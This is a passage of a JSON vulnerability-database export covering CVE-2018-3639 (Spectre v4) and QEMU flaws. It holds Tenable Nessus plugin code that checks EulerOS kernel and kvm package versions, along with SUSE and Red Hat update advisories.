get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kvm-4.4.11-421\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kvm\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-01T02:05:03", "bulletinFamily": "scanner", "description": "According to the version of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - An industry-wide issue was found in the way many modern\n microprocessor designs have implemented speculative\n execution of Load & Store instructions (a commonly used\n performance optimization). It relies on the presence of\n a precisely-defined instruction sequence in the\n privileged code as well as the fact that memory read\n from address to which a recent memory write has\n occurred may see an older value and subsequently cause\n an update into the microprocessor", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2018-1267.NASL", "href": "https://www.tenable.com/plugins/nessus/117576", "published": "2018-09-18T00:00:00", "title": "EulerOS Virtualization 2.5.1 : kernel (EulerOS-SA-2018-1267)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117576);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/06/28 11:31:59\");\n\n script_cve_id(\n \"CVE-2018-3639\"\n );\n\n script_name(english:\"EulerOS Virtualization 2.5.1 : kernel (EulerOS-SA-2018-1267)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - An industry-wide issue was found in the way many modern\n microprocessor designs have implemented speculative\n execution of Load & Store instructions (a commonly used\n performance optimization). It relies on the presence of\n a precisely-defined instruction sequence in the\n privileged code as well as the fact that memory read\n from address to which a recent memory write has\n occurred may see an older value and subsequently cause\n an update into the microprocessor's data cache even for\n speculatively executed instructions that never actually\n commit (retire). As a result, an unprivileged attacker\n could use this flaw to read privileged memory by\n conducting targeted cache side-channel\n attacks.(CVE-2018-3639)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1267\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fb9d2f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.5.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.5.1\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.5.1\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.44.5.10_41\",\n \"kernel-devel-3.10.0-514.44.5.10_41\",\n \"kernel-headers-3.10.0-514.44.5.10_41\",\n \"kernel-tools-3.10.0-514.44.5.10_41\",\n \"kernel-tools-libs-3.10.0-514.44.5.10_41\",\n \"kernel-tools-libs-devel-3.10.0-514.44.5.10_41\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}], "suse": [{"lastseen": "2018-11-10T02:37:49", "bulletinFamily": "unix", "description": "This update for qemu fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2018-12617: qmp_guest_file_read had an integer overflow that could\n have been exploited by sending a crafted QMP command (including\n guest-file-read with a large count value) to the agent via the listening\n socket causing DoS (bsc#1098735).\n - CVE-2018-11806: Prevent heap-based buffer overflow via incoming\n fragmented datagrams (bsc#1096223).\n\n With this release the mitigations for Spectre v4 are moved the the patches\n from upstream (CVE-2018-3639, bsc#1092885).\n\n This feature was added:\n\n - Add support for block resize support for disks through the monitor\n (bsc#1094725).\n\n This update was imported from the SUSE:SLE-12-SP3:Update update project.\n\n", "modified": "2018-11-10T00:23:53", "published": "2018-11-10T00:23:53", "id": "OPENSUSE-SU-2018:3709-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-11/msg00013.html", "title": "Security update for qemu (moderate)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:57", "bulletinFamily": "unix", "description": "Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639 virt-ssbd AMD)\n\nNote: This is the qemu-kvm side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.", "modified": "2018-10-30T22:22:31", "published": "2018-10-30T22:19:43", "id": "RHSA-2018:3424", "href": "https://access.redhat.com/errata/RHSA-2018:3424", "type": "redhat", "title": "(RHSA-2018:3424) Important: qemu-kvm security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-13T18:44:44", "bulletinFamily": "unix", "description": "The libvirt library contains a C API for managing and interacting with the virtualization capabilities of Linux and other operating systems. In addition, libvirt provides tools for remote management of virtualized systems.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639 virt-ssbd AMD)\n\nNote: This is the libvirt side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.", "modified": "2018-10-30T17:46:44", "published": "2018-10-30T17:44:50", "id": "RHSA-2018:3400", "href": "https://access.redhat.com/errata/RHSA-2018:3400", "type": "redhat", "title": "(RHSA-2018:3400) Important: libvirt security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-13T18:47:01", "bulletinFamily": "unix", "description": "KVM (Kernel-based Virtual Machine) is a full virtualization solution for\nLinux on a variety of architectures. The qemu-kvm-rhev packages provide the\nuser-space component for running virtual machines that use KVM in\nenvironments managed by Red Hat products.\n\nSecurity fix(es):\n* An industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of Load & Store instructions\n(a commonly used performance optimization). It relies on the presence of a\nprecisely-defined instruction sequence in the privileged code as well as\nthe fact that memory read from address to which a recent memory write has\noccurred may see an older value and subsequently cause an update into the\nmicroprocessor's data cache even for speculatively executed instructions\nthat never actually commit (retire). As a result, an unprivileged attacker\ncould use this flaw to read privileged memory by conducting targeted cache\nside-channel attacks. (CVE-2018-3639)\n\nAcknowledgements:\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center)\nand Jann Horn (Google Project Zero) for reporting this issue.\n\nNote: This is the qemu-kvm-rhev side of the CVE-2018-3639 mitigation that\nincludes support for guests running on hosts with AMD processors.\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section.", "modified": "2018-08-07T18:26:22", "published": "2018-08-07T18:25:28", "id": "RHSA-2018:2363", "href": "https://access.redhat.com/errata/RHSA-2018:2363", "type": "redhat", "title": "(RHSA-2018:2363) Important: qemu-kvm-rhev security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}]}